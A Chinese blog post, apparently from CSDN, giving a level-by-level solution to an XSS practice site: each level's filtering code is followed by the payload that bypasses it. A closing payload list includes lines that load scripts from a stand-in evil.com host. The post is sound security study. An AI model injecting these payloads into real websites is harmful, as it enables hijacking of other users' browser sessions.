XSS挑战赛

最新推荐文章于 2023-03-07 22:08:52 发布
最新推荐文章于 2023-03-07 22:08:52 发布
阅读量673 收藏 4
点赞数
分类专栏: XSS
DMIND
本文链接:https://blog.csdn.net/weixin_45669205/article/details/114751102
版权

前言:

对于我这种XSS小白(不对,把"XSS"去掉)还是能学到不少基础知识的
Here We GO!

练习地址:https://xss.haozi.me/#/0x00

0x00

function render (input) {
  return '<div>' + input + '</div>'
}

放在<div>中,直接就:

<script>alert(/1/)</script>



0x01

function render (input) {
  return '<textarea>' + input + '</textarea>'
}

闭合标签

</textarea><script>alert(1);</script>



0x02

<input type="name" value="">

闭合标签

"><script>alert(1)</script>



0x03——模板字符 ` 的使用

function render (input) {
  const stripBracketsRe = /[()]/g		/g是全局搜索的修饰符
  input = input.replace(stripBracketsRe, '')
  return input
}

过滤了括号:( )
但我们可以使用模板字符串:反引号

在Es6中,模版字符串可以紧跟在一个函数名后面,该函数将被调用来处理这个模板字符串,这被称为“标签模板”功能。

在这里插入图片描述

<script>alert`1`</script>



0x04——<svg><iframe srcdoc="">能解析HTML实体字符


function render (input) {
  const stripBracketsRe = /[()`]/g
  input = input.replace(stripBracketsRe, '')
  return input
}

反引号也被过滤了,我们考虑HTML实体字符
HTML实体字符是以 &# 开头 + 10进制 +以分号结尾以 &#x 开头 + 16进制 + 以分号结尾所表示的

其中<svg>标签可以解析HTML实体字符

<svg><script>alert&#40;1&x41;</script></svg>


H5中的 标签的 srcdoc 属性
该属性用法:<iframe srcdoc="HTML_code"> HTML code为HTML语法的内容

<iframe srcdoc=" <script>alert&#x28;1&#x29;</script>">



0x05——<!-- --!>HTML中对称的注释方式

function render (input) {
  input = input.replace(/-->/g, '😂')
  return '<!-- ' + input + ' -->'
}

HTML注释方式有什么?
<!-- --> 这种是标准注释方式
<!-- --!>这种对称的方式也行

--!><script>alert(1)</script>



0x06——onclick 、onerror、onmouseover事件 与换行绕过正则

function render (input) {
  input = input.replace(/auto|on.*=|>/ig, '_')
  return `<input value=1 ${input} type="text">`
}

HTML:
<input value=1  type="text">

没有/m 多行匹配那就用换行来绕过使用on属性

onmouseover
=alert(1)

onclick
=alert(1)

type=image src='' onerror
=alert(1)
...................



0x07——浏览器有容错性,不加’>'也可

function render (input) {
  const stripTagsRe = /<\/?[^>]+>/gi

  input = input.replace(stripTagsRe, '')
  return `<article>${input}</article>`
}

HTML:
<article></article>

过滤以 <开头, >结尾的字符

利用了浏览器的容错性,即使不写全< >也能执行

<img  src='' οnerrοr="alert(1)" 
<input οnmοuseοver="alert(1)" 

function render (src) {
  src = src.replace(/<\/style>/ig, '/* \u574F\u4EBA */')
  return `
    <style>
      ${src}
    </style>
  `
}


HTML:
<style>
      
    </style>

过滤了</style>,不过毕竟是黑名单,可以通过空格与换行的方式

</style  ><script>alert(1)</script>

或者

</style  
><script>alert(1)</script>



0x09——//是js的注释方式

function render (input) {
  let domainRe = /^https?:\/\/www\.segmentfault\.com/
  if (domainRe.test(input)) {
    return `<script src="${input}"></script>`
  }
  return 'Invalid URL'
}

Regexp.test() 方法用于检测一个字符串是否匹配Regexp
//在js中是注释方式

https://www.segmentfault.com "></script><svg/οnlοad="alert(1)" //

<svg/οnlοad="alert(1)">这种方式学到了



0x0A——URL中的 @ 与加载外部代码

function render (input) {
  function escapeHtml(s) {
    return s.replace(/&/g, '&amp;')
            .replace(/'/g, '&#39;')
            .replace(/"/g, '&quot;')
            .replace(/</g, '&lt;')
            .replace(/>/g, '&gt;')
            .replace(/\//g, '&#x2f')
  }

  const domainRe = /^https?:\/\/www\.segmentfault\.com/
  if (domainRe.test(input)) {
    return `<script src="${escapeHtml(input)}"></script>`
  }
  return 'Invalid URL'
}

进行了escape()的编码并指定了一些字符的替换。这就导致无法闭合上script了,需要外部加载js代码

http:// username:password @ hostname注意@后面才是我们要访问的域名

例如:http://yahoo.com@216.58.194.110你访问的不是yahoo.com而是后面的IP地址

https://www.segmentfault.com@xss.haozi.me/j.js  //在chrome浏览器不成功,但在火狐可以

这里的xss.haozi.me/j.js是一个写有alert(1)js代码的页面



0x0B、0x0C——js区分大小写,html不区分。

function render (input) {
  input = input.toUpperCase()
  return `<h1>${input}</h1>`
}

js中变量名,函数,关键字都区分大小写,如var i;和var I;是两个不同的变量。

css中定义的元素名称不区分大小写的。

html中,标签和标签属性统一使用小写形式,固有属性也一律使用小写,自定义属性或标签中含有的大写均会被转换成小写。

换句话说:

html: 大小写不敏感
css: 大小写不敏感
javascript: 大小写敏感

alert(1)是不可以大写的,可以利用HTML编码绕过(毕竟&#与数字哪有什么大小写)

<img src='' onerror=&#97;&#108;&#101;&#114;&#116;&#40;1&#41;>

看到下一题发现过滤了script说明script才是这题的预期解。那么就是利用 src外部加载了

<script src="https://www.segmentfault.com.haozi.me/j.js"></script>



0x0D——换行绕过注释符

function render (input) {
  input = input.replace(/[</"']/g, '')
  return `
    <script>
          // alert('${input}')
    </script>
  `
}

HTML:
<script>
          // alert('')
    </script>

换行绕过注释符//这个不难想到。关键还有')跟在输入的后面,本来想着js注释符的却发现被过滤了…
后来看大佬们做法才想起来HTML注释符…想错方向了

alert(1) 
-->



0x0E——'ſ'.toUpperCase()=S 特殊字符

function render (input) {
  input = input.replace(/<([a-zA-Z])/g, '<_$1')
  input = input.toUpperCase()
  return '<h1>' + input + '</h1>'
}

HTML<h1></h1>

emmm,想不出来…哎

大佬们是是利用一些特殊字符的特殊情况绕过的,详情的特殊情况请看这里

这些是在特定函数下的特殊转换:
toUpperCase():
ı ==>I
ſ ==>S

toLowerCase():
İ ==>i
K ==>k

这其中的ſ就可以被利用为S

这是大佬们的做法:

<ſcript src="https://xss.haozi.me/j.js"></script>

但我想着HTML编码alert(1),但不成功…why?

<ſcript>&#97;&#108;&#101;&#114;&#116;&#40;1&#41;</ſcript>



0x0F——以下题目都是闭合操作

function render (input) {
  function escapeHtml(s) {
    return s.replace(/&/g, '&amp;')
            .replace(/'/g, '&#39;')
            .replace(/"/g, '&quot;')
            .replace(/</g, '&lt;')
            .replace(/>/g, '&gt;')
            .replace(/\//g, '&#x2f;')
  }
  return `<img src οnerrοr="console.error('${escapeHtml(input)}')">`
}



HTML:
<img src onerror="console.error('')">

对html 、js 转义就是做无用功,浏览器会先解析html, 然后再解析 js

闭合console.error,又因为在onerror事件中,用分号;执行多语句

');alert('1



0x10

function render (input) {
  return `
<script>
  window.data = ${input}
</script>
  `
}

HTML:
<script>
  window.data = 
</script>

直接闭合window.data然后执行alert

1;alert(1)



0x11

// from alf.nu
function render (s) {
  function escapeJs (s) {
    return String(s)
            .replace(/\\/g, '\\\\')
            .replace(/'/g, '\\\'')
            .replace(/"/g, '\\"')
            .replace(/`/g, '\\`')
            .replace(/</g, '\\74')
            .replace(/>/g, '\\76')
            .replace(/\//g, '\\/')
            .replace(/\n/g, '\\n')
            .replace(/\r/g, '\\r')
            .replace(/\t/g, '\\t')
            .replace(/\f/g, '\\f')
            .replace(/\v/g, '\\v')
            // .replace(/\b/g, '\\b')
            .replace(/\0/g, '\\0')
  }
  s = escapeJs(s)
  return `
<script>
  var url = 'javascript:console.log("${s}")'
  var a = document.createElement('a')
  a.href = url
  document.body.appendChild(a)
  a.click()
</script>
`
}



HTML:
<script>
  var url = 'javascript:console.log("")'
  var a = document.createElement('a')
  a.href = url
  document.body.appendChild(a)
  a.click()
</script>

代码有点多,但思路就是在输入的地方进行闭合,执行我们要的命令

"),alert(1)//



0x12

// from alf.nu
function escape (s) {
  s = s.replace(/"/g, '\\"')
  return '<script>console.log("' + s + '");</script>'
}


HTML:
<script>console.log("");</script>

同样是闭合,要注意转义符号,因为"会多出一个\而它会转义后面的"所以要在前面加上\。跟上题的原理一样

\");alert(1)//




记录一些payload:

<h1 onmousemove="alert('moved!')">a trick</h1>

<img src=x onerror="alert('error!')" />

<script src="http://evil.com/a.js"></script>

<script>alert(1)</script>

<link rel="import" href="http://evil.com/1.html">

<iframe src="javascript:alert(1)"></iframe>		//javascript伪协议

<a href="javascript:alert(1)">click</a>

<svg/onload=alert(1)>

<input onfocus=write(1) autofocus> 

<input onblur=write(1) autofocus><input autofocus>

<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>		//data伪协议  <script>alert(1)</script>的编码
D.MIND
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
xss闯关挑战
11-09
这个是XSS闯关文件,解压后放在服务器的对应文件夹即可。 闯关笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如...
XSS挑战赛(xsslabs)1~10关通关解析
黄乔国PHP
03-06 774
XSS挑战赛,里面包含了各种XSS的防御方式和绕过方式,好好掌握里面的绕过细节,有助于我们更好的去发现XSS漏洞以及XSS的防御。本文更多的是分享解析的细节,不是一个标准的答案,希望大家在渗透的时候有更多的思维。
xss挑战(超详细小白)
weixin_64655821的博客
09-22 1315
xss挑战前十关
XSS挑战赛解题思路
多崎巡礼的博客
11-07 6205
xss挑战赛解题思路。。。 level1 &amp;amp;amp;amp;amp;amp;lt;!DOCTYPE html&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;amp;lt;!--STATUS OK--&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;amp;lt;html&amp;amp;amp;amp;amp;amp;gt; &amp;a
XSS挑战赛--Writeup(共16题)
1stPeak's Blog
06-10 2212
XSS挑战赛--解题思路 Level-1 Level-2 Level-3 Level-4 Level-5 Level-6 Level-7 Level-8 Level-9 Level-10 Level-11 Level-12 Level-13 Level-14 Level-15 Level-16 Level-1 源码: <!DOCTYPE html><!--STATUS OK-...
XSS】十九道XSS弹窗专项练习
share something here
05-25 3056
XSS专项练习参考项目外观样式0x00 div标签,常规插入0x01 textarea标签 闭合该后插入0x02 内容放在标签内,`">`闭合标签0x03 过滤(),使用反单引号`0x04 过滤括号()和反单引号` 使用html实体编码来绕过0x05 闭合注释符0x06 正则过滤auto/on开头及`=`结尾和`>` 换行绕过匹配0x07 正则匹配,空格绕过解析0x08 换行或空格绕过正则匹配0x09 let 声明,RegExp.test()正则白名单0x0A 升级版0x09过滤后再白名单 参考
xss-labs挑战(一) 1
08-08
XSS-labs 挑战(一)1 本文将详细介绍 XSS-labs 挑战(一)1 的知识点,包括挑战的安装、Level 1 无过滤机制、Level 2 闭合标签、Level 3 单引号闭合+htmlspecialchar()函数、Level 4 双引号闭合+添加事件、Level 5...
xss常见payload脚本
09-01
xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。...
springboot整合XSS
03-20
springboot 整合预防xss攻击
Xss Scan tool
05-25
Xss Scan,一款可以安装在burpsuite的插件,用于xss漏洞的扫描。 专业 好用
xss 挑战赛 — 解题思路
苏柳欣的博客
09-07 711
      发现了一个xss学习的平台,上面有xss靶机,顺便巩固下之前关于xss的一些知识,这个平台还是很不错的。 Level 1       第一关直接审查页面源代码可以通过get方式进行弹窗,无过滤,pass payload: <script>alert...
xss漏洞简单案例
weixin_59280309的博客
07-29 2757
xss漏洞简单案例。svg 命名空间
xss绕过字符过滤_Xss小游戏通关秘籍
weixin_39758712的博客
12-01 487
原创: Kale 合天智汇原创投稿活动:https://link.zhihu.com/?target=https%3A//mp.weixin.qq.com/s/Nw2VDyvCpPt_GG5YKTQuUQ题记最近发现一个xss的攻防网站,界面很有意思,很适合寓教于乐。于是玩了一下午,特此记录下来!xss姿势众多,所以每关也只是给了一部分示例!知识前导什么是XSSXSS 或者说跨站脚本是一种 We...
XSS挑战赛(xsslabs)11~16关通关解析
黄乔国PHP
03-07 652
总的来说xsslabs还是很有代表意义的,里面提供了很多绕过和防御XSS的思路。所谓知己知彼在这里面体现的淋漓尽致了。
一个小众搞笑的xss漏洞练习平台
qq_35664104的博客
08-12 735
XSS是当今网络安全事件中数量最多的攻击方式,虽然其危害性不高,但主要和其他攻击手段相结合,以实现一个复杂的攻击场景。那么,XSS是什么? XSS全称跨站脚本(Cross Site Scripting),较合适的方式应该叫做跨站脚本攻击跨站脚本 攻击是一种常见的web安全漏洞,它主要是指攻击者可以在页面中插入恶意脚本代码,当受 害者访问这些页面时,浏览器会解析并执行这些恶意代码,被用于进行窃取隐私、钓鱼欺 骗、窃取密码、传播恶意代码等攻击。 XSS攻击使用到的技术主要为HTML和Javascript,也
xss挑战赛 level 1-13
yukinorong的博客
08-19 993
08/19 刷题网站1 http://test.xss.tv xss挑战需要用火狐浏览器,可能是谷歌浏览器对xss有保护措施。 xss挑战 level 1 第一题为反射性xss,直接构造参数为<script>alert(1)</script>即可 xss挑战 level 2 查看源码发现输入框在Input标签中,先闭合标签,在插入。 "><script>a...
Xss小游戏通关秘籍
蚁景网安学院
11-26 886
本文作者:kale 本文首发于“合天智汇”公众号,转载请联系公众号! 一、 题记 最近发现一个xss的攻防网站,界面很有意思,很适合寓教于乐。于是玩了一下午,特此记录下来!xss姿势众多,所以每关也只是给了一部分示例! 二、 知识前导 什么是XSSXSS 或者说跨站脚本是一种 Web 应用程序的漏洞,当来自用户的不可信数据被应用程序在没有验证以及反射回浏览器而没有进行编码或转义的情况下进行...
XSS挑战赛记录
卧龙居
06-14 1553
比赛网址:http://prompt.ml/0 第一题: 需要无交互的触发JS脚本的执行。代码如下: ">
xss挑战赛-wp
Iambangbang的博客
08-20 954
prompt(1) to win problem 0   这道题没有别的特别之处,直接闭合标签然后构造就可以了,这里直接放payload ">prompt(1) 但是通过看大牛的wp这里也积累一些其他的思路, ">这个思路是利用了onload的免交互的特性 "onresize=prompt(1)>这个思路不常用,但是在IE10下,当页面第一次加载时,会调用resize事件,当把代
ctf比赛 web渗透
最新发布
10-17
好的,我明白了。对于你的问题,我可以提供一些基本的信息和建议。 首先,CTF比赛中的Web渗透是一个非常广泛的主题,涉及到许多不同的技术和工具。一般来说,这种类型的比赛会涉及到一些常见的漏洞,例如SQL注入、XSS、CSRF等等。因此,你需要掌握这些漏洞的基本原理和检测方法。 其次,你需要熟悉一些常用的Web渗透工具,例如Burp Suite、OWASP ZAP、sqlmap等等。这些工具可以帮助你自动化地检测漏洞,并且提供一些有用的功能,例如拦截和修改HTTP请求、抓取和分析响应等等。 最后,你需要不断练习和提高自己的技能。参加一些CTF比赛或者挑战赛可以帮助你锻炼自己的技能,并且学习到一些新的技术和工具。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值